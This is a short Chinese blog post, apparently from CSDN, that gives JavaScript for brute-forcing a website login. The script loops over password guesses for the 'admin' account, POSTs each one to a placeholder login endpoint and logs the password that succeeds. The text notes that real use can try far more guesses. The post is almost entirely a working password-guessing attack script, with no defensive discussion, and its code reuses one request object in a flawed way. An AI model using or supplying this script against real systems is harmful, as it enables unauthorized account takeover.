版权声明:本文为博主原创文章,未经博主允许不得转载。 https://blog.csdn.net/fifteen718/article/details/83894900
此处以一个简单的测试用户登录接口为例。。。
如果一个网站的登录模块设计的很简单的话,可以通过不断发起请求去测试一个账号的密码。。。
// 第一步:创建 XMLHttpRequest 对象
var xmlhttp;
if (window.XMLHttpRequest) {// code for IE7+, Firefox, Chrome, Opera, Safari
xmlhttp = new XMLHttpRequest();
}
else {// code for IE6, IE5
xmlhttp = new ActiveXObject("Microsoft.XMLHTTP");
}
// 此处仅做一个简单的10次循环例子,实际中可以进行疯狂地尝试
for (let i = 0; i < 10; i++) {
let data = "account=admin&password=" + i
setTimeout(function () {
// 第二步:向服务器发送请求
xmlhttp.open("POST", "https://yourServerUrL/loginByPwd", true);
xmlhttp.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
xmlhttp.send(data)
// 第三步:获得来自服务器的响应
xmlhttp.onreadystatechange = function () {
if (xmlhttp.readyState == 4 && xmlhttp.status == 200) {
if(JSON.parse(xmlhttp.responseText).code === "200") {
console.log('账号admin的密码为'+i)
}
}
}
}, i * 500)
}